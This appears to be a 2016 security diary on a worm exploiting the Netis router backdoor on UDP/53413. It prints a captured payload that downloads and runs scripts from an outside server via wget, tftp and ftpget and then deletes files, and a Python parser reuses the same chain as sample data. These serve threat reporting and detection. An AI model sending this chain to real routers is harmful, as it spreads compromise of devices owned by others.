Surge in Exploit Attempts for Netis Router Backdoor (UDP/53413)

Published: 2016-08-04
Last Updated: 2016-08-04 11:12:34 UTC
by Johannes Ullrich (Version: 1)

We started to see a surge in attempts to exploit a well-known backdoor in Netis routers. The backdoor was first described in 2014 by TrendLabs [1]. Netis routers are used predominantly in China, but can occasionally be found in other parts of the world.

Exploitation of the backdoor is easy: Any payload sent to port 53413/UDP is automatically executed. Various exploit tools for this issue are available, but probably all you need is netcat to trigger the problem. (thanks to Bill for pointing this out!)

About a week ago, the number of exploit attempts detected by DShield skyrocketed. Given the rapid increase not only in targets, but also in the sources doing the scanning, the likely cause is a worm that infects vulnerable routers and turns them into scanners.

It only took me seconds to capture an exploit attempt (I formatted the bash code for readability). The IP address of the web/ftp/tftp server below is different from the IP address the attack came from, so unlike other worms, the victim does not appear to be offering the files for download.

cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;
wget http://49.50.71.149/bins.sh; chmod 777 bins.sh; sh bins.sh;
tftp 49.50.71.149 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh;
tftp -r tftp2.sh -g 49.50.71.149; chmod 777 tftp2.sh; sh tftp2.sh;
ftpget -v -u anonymous -p anonymous -P 21 49.50.71.149 ftp1.sh ftp1.sh; sh ftp1.sh;
rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *.

bins.sh attempts to download some files compiled for the MIPS platform, which matches the affected Netis routers. Downloads are slow, indicating that the server delivering them may be rather busy, but the IP address above is not the only IP address seen in these attacks. At this point, it is highly unlikely that any vulnerable devices are still unexploited.
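As an added illustration (not code from the diary), the following Python picks datagrams aimed at UDP/53413 out of sensor records, pulls the download servers out of the wget/tftp/ftpget chain shown above, and records whether the scanning host also serves the files, the distinction drawn in the capture. The Datagram record, the TEST-NET addresses and the sample payload are constructed for this example.

```python
import re
from collections import namedtuple

# A captured datagram as a sensor might record it (constructed for this example).
Datagram = namedtuple("Datagram", "src_ip dst_port payload")
NETIS_BACKDOOR_PORT = 53413
IPV4 = r"(\d{1,3}(?:\.\d{1,3}){3})"
# Each pattern captures the host a fetch command pulls the next stage from.
FETCH_PATTERNS = [
    re.compile(r"wget\s+\S*?://" + IPV4),              # wget http://<host>/...
    re.compile(r"tftp\s+" + IPV4 + r"\s+-c\s+get"),    # tftp <host> -c get <file>
    re.compile(r"tftp\s+-r\s+\S+\s+-g\s+" + IPV4),     # tftp -r <file> -g <host>
    re.compile(r"ftpget\b[^;]*?" + IPV4),              # ftpget ... <host> <file> <file>
]
# "chmod 777 <file>; sh <file>" is the execute step after each wget/tftp fetch.
EXEC_STEP = re.compile(r"chmod\s+777\s+(\S+);\s*sh\s+\1\b")

def download_hosts(payload):
    """Set of IPv4 hosts the payload fetches its next stage from."""
    hosts = set()
    for pat in FETCH_PATTERNS:
        hosts.update(pat.findall(payload))
    return hosts

def classify(dg):
    """None for traffic not aimed at the backdoor port, else a summary dict."""
    if dg.dst_port != NETIS_BACKDOOR_PORT:
        return None
    hosts = download_hosts(dg.payload)
    return {
        "src_ip": dg.src_ip,
        "download_hosts": sorted(hosts),
        "exec_steps": len(EXEC_STEP.findall(dg.payload)),
        # True when the scanning host also serves the files; in the diary's
        # capture the server was a different IP, so this would be False.
        "self_hosting": dg.src_ip in hosts,
    }

# Constructed sample: the diary's downloader chain, with a TEST-NET server IP.
PAYLOAD = ("cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;"
           "wget http://203.0.113.45/bins.sh; chmod 777 bins.sh; sh bins.sh;"
           "tftp 203.0.113.45 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh;"
           "tftp -r tftp2.sh -g 203.0.113.45; chmod 777 tftp2.sh; sh tftp2.sh;"
           "ftpget -v -u anonymous -p anonymous -P 21 203.0.113.45 ftp1.sh ftp1.sh; sh ftp1.sh;"
           "rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *")
SAMPLE = [
    Datagram("198.51.100.7", 53413, PAYLOAD),  # scanner; files served elsewhere
    Datagram("198.51.100.7", 53, "\x12\x34"),  # ordinary DNS noise, ignored
    Datagram("203.0.113.45", 53413, PAYLOAD),  # scanner that serves its own files
]
```

Feeding real sensor records through classify() gives a quick count of distinct download servers behind a scanning wave, which is the figure the diary uses to argue that one server is not the whole picture.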

[1] http://blog.trendmicro.com/trendlabs-security-intelligence/netis-routers-leave-wide-open-backdoor/

---
Johannes B. Ullrich, Ph.D.
